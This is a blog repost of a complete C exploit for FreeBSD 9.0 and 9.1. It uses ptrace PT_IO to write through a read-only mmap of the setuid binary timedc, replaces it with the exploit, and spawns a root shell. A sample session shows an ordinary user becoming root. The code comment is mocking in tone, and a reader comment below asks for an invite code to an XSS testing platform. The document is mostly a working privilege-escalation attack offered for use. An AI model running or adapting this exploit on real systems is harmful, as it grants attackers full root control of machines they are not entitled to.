FreeBSD 9.{0,1} mmap/ptrace exploit

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger <fbsd9lul () hunger hu>
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... 🙂
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8 () 1470n 😉
*
* Special thanks to proactivesec.com
*

$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root () farrell cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul () hunger hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#

*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;

if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}

printf("FreeBSD 9.{0,1} mmap/ptrace exploitn");
printf("by Hunger <fbsd9lul () hunger hu>n");

if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");

if (stat(av[0], &st) == -1)
err(2, "stat");

if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, "mmap");

if ((pid = fork()) == -1)
err(4, "fork");

if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");

return 0;
}

if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");

if (wait(&status) == -1)
err(7, "wait");

piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;

if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");

execl(TG, TG, NULL);

return 0;
}

本文固定链接: https://www.unhonker.com/bug/1300.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年06月20日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: FreeBSD 9.{0,1} mmap/ptrace exploit | 90' s Blog|关注网络信息安全
关键字:

FreeBSD 9.{0,1} mmap/ptrace exploit:目前有1 条留言

  1. 沙发
    robothee:

    能不能给个Xss测试平台邀请码最近正在自学xss为自己的web应用加固
    mail:hehanjm@163.com

    2013-07-01 23:53

发表评论

您必须 [ 登录 ] 才能发表留言!